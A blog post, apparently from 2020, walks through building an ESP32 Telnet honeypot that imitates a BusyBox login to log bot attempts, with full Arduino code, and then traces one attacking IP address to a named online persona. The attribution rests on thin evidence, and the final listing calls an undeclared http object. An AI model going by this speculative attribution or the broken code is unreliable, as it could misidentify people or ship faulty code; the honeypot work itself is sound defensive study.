Bots, attackers and honeypots
Posted May 22, 2020 08:00 AM
Bots Attackers and honeypotsDid you ever wonder how many times a day you are deliberately being scanned or attacked online?
More and more items are connected to the internet IoT devices are getting more and more implemented into our daily lives.
Small Linux devices capable of communicating on the internet are everywhere these days.
With these devices on the rise, it's just normal that the threat of online attacks is also rising.
Why?
Well, most of the time IoT devices are less secure (Out of the box) then your computer system and the reason is pretty simple. These devices are targeting everyone not only the computer geek/minded person, but these devices can also be for granny and grandpa.
To be accessible by all requires them to be easy to use for all.
The most common strategy is to include standard passwords or usernames.
If you keep these default settings it would be really easy for malicious people to gain access to your device.
The scariest of all is that they are doing it and they're doing it in mass.
Bots are targeting them all the time (if they find them) executing pre-programmed instructions on them when they find one.
A few years ago I've coded a Github project called PotHead a Telnet honeypot Python script.
Today I've revitalized the project under the name HoneyHive. This code runs on an ESP32 and simulates a Telnet server and logs the data to a NO-SQL REST Database.
You can find the complete Source code here:
https://hackforums.net/showthread.php?tid=6066976
To make a similar server is rather easy.
You can find a generic Telnet server like the setup in the coding examples of you ESP32. Why should u do something if someone already did it right?
It should look something like this.
Code
/*
WiFiTelnetToSerial - Example Transparent UART to Telnet Server for ESP32
Copyright (c) 2017 Hristo Gochkov. All rights reserved.
This file is part of the ESP32 WiFi library for Arduino environment.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 1
const char* ssid = "**********";
const char* password = "**********";
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
Serial.begin(115200);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
wifiMulti.addAP("ssid_from_AP_2", "your_password_for_AP_2");
wifiMulti.addAP("ssid_from_AP_3", "your_password_for_AP_3");
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
//start UART and the server
Serial2.begin(9600);
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//get data from the telnet client and push it to the UART
while(serverClients[i].available()) Serial2.write(serverClients[i].read());
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
}
//check UART for data
if(Serial2.available()){
size_t len = Serial2.available();
uint8_t sbuf[len];
Serial2.readBytes(sbuf, len);
//push UART data to all connected telnet clients
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
serverClients[i].write(sbuf, len);
delay(1);
}
}
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}This code still contains a lot of things we don't need. This code is sending UART data to connected clients.
So let's clean it up
Code
/*
WiFiTelnetToSerial - Example Transparent UART to Telnet Server for ESP32
Copyright (c) 2017 Hristo Gochkov. All rights reserved.
This file is part of the ESP32 WiFi library for Arduino environment.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 3
const char* ssid = "**********";
const char* password = "**********";
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
Serial.begin(115200);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//get data from the telnet client and push it to the UART
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}I've removed all mentions of Serial2 and removed the whole UART thing. added more clients up to 3. and set serial communication to 9600 baud this is easier for me to use because it's the default baud rate in the program (VScode platform.io) that I'm using for this.
what's next?
Well we need to emulate some more things make it look like a generic Telnet server
Code
#include <WiFi.h>
#include <WiFiMulti.h>
WiFiMulti wifiMulti;
//how many clients should be able to telnet to this ESP32
#define MAX_SRV_CLIENTS 3
#define CTRLLED 2
#define ARRAYSIZE 4
const char* ssid = "*****";
const char* password = "*****";
int clientNumber[ARRAYSIZE];
WiFiServer server(23);
WiFiClient serverClients[MAX_SRV_CLIENTS];
void setup() {
pinMode(CTRLLED,OUTPUT);
digitalWrite(CTRLLED,HIGH);
Serial.begin(9600);
Serial.println("\nConnecting");
wifiMulti.addAP(ssid, password);
Serial.println("Connecting Wifi ");
for (int loops = 10; loops > 0; loops--) {
if (wifiMulti.run() == WL_CONNECTED) {
digitalWrite(CTRLLED,LOW);
Serial.println("");
Serial.print("WiFi connected ");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
break;
}
else {
Serial.println(loops);
delay(1000);
}
}
if (wifiMulti.run() != WL_CONNECTED) {
Serial.println("WiFi connect failed");
delay(1000);
ESP.restart();
}
server.begin();
server.setNoDelay(true);
Serial.print("Ready! Use 'telnet ");
Serial.print(WiFi.localIP());
Serial.println(" 23' to connect");
}
void loop() {
uint8_t i;
if (wifiMulti.run() == WL_CONNECTED) {
//check if there are any new clients
if (server.hasClient()){
for(i = 0; i < MAX_SRV_CLIENTS; i++){
//find free/disconnected spot
if (!serverClients[i] || !serverClients[i].connected()){
if(serverClients[i]) serverClients[i].stop();
serverClients[i] = server.available();
if (!serverClients[i]) Serial.println("available broken");
Serial.print("New client: ");
Serial.print(i); Serial.print(' ');
Serial.println(serverClients[i].remoteIP());
serverClients[i].write("Welcome! Telnet server ...V0.012.198... \r\n LoRa Wan SusKey 0.2.9 (c) 1999-2004 \r\n -*-contact [email protected] for further information!-*-\r\n Busybox V1.12.4 (2020-04-13) Built-in shell \r\n Enter 'help for a list of built in commands. \r\n tty id \"/dev/pts/0 \"\r\n\r\n");
break;
}
}
if (i >= MAX_SRV_CLIENTS) {
//no free/disconnected spot so reject
server.available().stop();
}
}
//check clients for data
for(i = 0; i < MAX_SRV_CLIENTS; i++){
if (serverClients[i] && serverClients[i].connected()){
if(serverClients[i].available()){
//get data from the telnet client and push it to the UART
String dBuff = "";
while(serverClients[i].available()){
dBuff = serverClients[i].readString();
}
if(dBuff.indexOf("bin") >= 0){
serverClients[i].write("Running in background!\r\n");
}
Serial.print(serverClients[i].remoteIP());
Serial.print(" : ");
Serial.print(i);
Serial.print(" : ");
Serial.println(dBuff);
clientNumber[i]++;
if(clientNumber[i]==1){
serverClients[i].write("\r\nusername: ");
}
else if (clientNumber[i]==2)
{
serverClients[i].write("\r\npassword: ");
}
else{
serverClients[i].write("#> ");
}
dBuff ="";
}
}
else {
if (serverClients[i]) {
serverClients[i].stop();
}
}
http.end();
}
}
else {
Serial.println("WiFi not connected!");
for(i = 0; i < MAX_SRV_CLIENTS; i++) {
if (serverClients[i]) serverClients[i].stop();
}
delay(1000);
}
}Wow, that took some time. But it's pretty easy!
Code
serverClients[i].write("");Everything is now logged to serial so that's not handy to analyze everything later. That's why you'll need a (simple) database
SQL is fine but I want something different something so that I can easily make a nice not to complex front end
I laid my eyes on this website restdb.io a Rest DB it could be easily be implemented in my code only a few more modifications and we're done.
The most important things are the headers that include the API-key and the JSON Query that puts the data in the DB.
One thing to note when these bots are putting in data they can mess that query up so you'll need to base 64 encode them to take all the garbage out you can later decode them back.
This should be the code you'll eventually end up with
Just take a closer look at the code it isn't hard, to be brutally honest this is easy peasy.
Add some magic to make a page on Restdb.io and you're done!
And my o my I've found some interesting things.
The fun thing while doing these projects is that you can truly dive in and be a detective. You can find out so much analyzing the attackers.
All those IP-addresses share a common story they belong to someone and the somehow became part of a botnet(farm).
One of this IP adresses was
Quote:23.254.226.60
My curious self wanted to know if maybe this IP address had a webserver running and my o my I was so surprised when he did have one running although it was badly developed
![[Image: download-1.png]](https://i.ibb.co/922Ktq3/download-1.png)
Well what could I find out about the person that was so eagerly trying to get inside my poor poor ESP32 well that that dodgy visitor counter on the website let me to another page
![[Image: download-2.png]](https://i.ibb.co/MpqPgBG/download-2.png)
He is also using this counter on another website Wow! Well, this is getting more interesting. Generic website nothing off interest on it but hey a small youtube icon where is this leading me to?
![[Image: download-3.png]](https://i.ibb.co/BnfgZLB/download-3.png)
Well, it leads me to a Youtube account and Discord server and ultimately to a guy called Greek Helios.
![[Image: download-4.png]](https://i.ibb.co/jh486wz/download-4.png)
Most of these IP addresses have a more tragic story to them they are most of the time Network-attached servers or routers of some kind being held hostage by a bot most of them are a variant to Mirai.
Know you know the story about bots attackers and honeypots.
And here you can watch it grow!
https://honeyhive-418b.restdb.io/views/intruders
Thank you so much for reading this document. Stay tuned for my next post. Stay safe and stay home!
